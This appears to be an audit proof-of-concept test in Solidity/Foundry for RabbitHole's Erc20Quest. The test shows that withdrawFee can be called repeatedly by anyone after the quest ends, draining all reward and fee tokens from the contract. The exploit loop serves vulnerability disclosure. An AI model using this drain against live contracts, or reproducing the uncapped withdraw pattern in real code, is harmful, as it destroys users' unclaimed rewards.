function withdrawFee() public onlyAdminWithdrawAfterEnd {
    IERC20(rewardToken).safeTransfer(protocolFeeRecipient, protocolFee());
}
modifier onlyAdminWithdrawAfterEnd() {
    if (block.timestamp < endTime) revert NoWithdrawDuringClaim();
    _;
}
contract AuditTest is Test {
    address deployer;
    uint256 signerPrivateKey;
    address signer;
    address royaltyRecipient;
    address minter;
    address protocolFeeRecipient;

    QuestFactory factory;
    ReceiptRenderer receiptRenderer;
    RabbitHoleReceipt receipt;
    TicketRenderer ticketRenderer;
    RabbitHoleTickets tickets;
    ERC20 token;

    function setUp() public {
        deployer = makeAddr("deployer");
        signerPrivateKey = 0x123;
        signer = vm.addr(signerPrivateKey);
        vm.label(signer, "signer");
        royaltyRecipient = makeAddr("royaltyRecipient");
        minter = makeAddr("minter");
        protocolFeeRecipient = makeAddr("protocolFeeRecipient");

        vm.startPrank(deployer);

        // Receipt
        receiptRenderer = new ReceiptRenderer();
        RabbitHoleReceipt receiptImpl = new RabbitHoleReceipt();
        receipt = RabbitHoleReceipt(
            address(new ERC1967Proxy(address(receiptImpl), ""))
        );
        receipt.initialize(
            address(receiptRenderer),
            royaltyRecipient,
            minter,
            0
        );

        // factory
        QuestFactory factoryImpl = new QuestFactory();
        factory = QuestFactory(
            address(new ERC1967Proxy(address(factoryImpl), ""))
        );
        factory.initialize(signer, address(receipt), protocolFeeRecipient);
        receipt.setMinterAddress(address(factory));

        // tickets
        ticketRenderer = new TicketRenderer();
        RabbitHoleTickets ticketsImpl = new RabbitHoleTickets();
        tickets = RabbitHoleTickets(
            address(new ERC1967Proxy(address(ticketsImpl), ""))
        );
        tickets.initialize(
            address(ticketRenderer),
            royaltyRecipient,
            minter,
            0
        );

        // ERC20 token
        token = new ERC20("Mock ERC20", "MERC20");
        factory.setRewardAllowlistAddress(address(token), true);

        vm.stopPrank();
    }

    function signReceipt(address account, string memory questId)
        internal
        view
        returns (bytes32 hash, bytes memory signature)
    {
        hash = keccak256(abi.encodePacked(account, questId));
        bytes32 message = ECDSA.toEthSignedMessageHash(hash);
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPrivateKey, message);
        signature = abi.encodePacked(r, s, v);
    }

    function claimReceipt(address account, string memory questId) internal {
        (bytes32 hash, bytes memory signature) = signReceipt(account, questId);
        vm.prank(account);
        factory.mintReceipt(questId, hash, signature);
    }
    
    function test_Erc20Quest_ProtocolFeeWithdrawMultipleTimes() public {
        address alice = makeAddr("alice");
        address attacker = makeAddr("attacker");

        uint256 startTime = block.timestamp + 1 hours;
        uint256 endTime = startTime + 1 hours;
        uint256 totalParticipants = 1;
        uint256 rewardAmountOrTokenId = 1 ether;
        string memory questId = "a quest";

        // create, fund and start quest
        vm.startPrank(deployer);

        Erc20Quest quest = Erc20Quest(
            factory.createQuest(
                address(token),
                endTime,
                startTime,
                totalParticipants,
                rewardAmountOrTokenId,
                "erc20",
                questId
            )
        );

        uint256 rewards = totalParticipants * rewardAmountOrTokenId;
        uint256 fees = (rewards * factory.questFee()) / 10_000;
        deal(address(token), address(quest), rewards + fees);
        quest.start();

        vm.stopPrank();

        // simulate at least one user claims a receipt
        claimReceipt(alice, questId);

        // simulate time elapses until the end of the quest
        vm.warp(endTime);

        // The following can be executed by attacker (griefer) or by the fee recipient
        vm.startPrank(attacker);

        uint256 protocolFee = quest.protocolFee();
        uint256 withdrawCalls = (rewards + fees) / protocolFee;

        for (uint256 i = 0; i < withdrawCalls; i++) {
            quest.withdrawFee();
        }

        // Fee recipient has 100% of the funds
        assertEq(token.balanceOf(protocolFeeRecipient), rewards + fees);
        assertEq(token.balanceOf(address(quest)), 0);

        vm.stopPrank();
    }
}
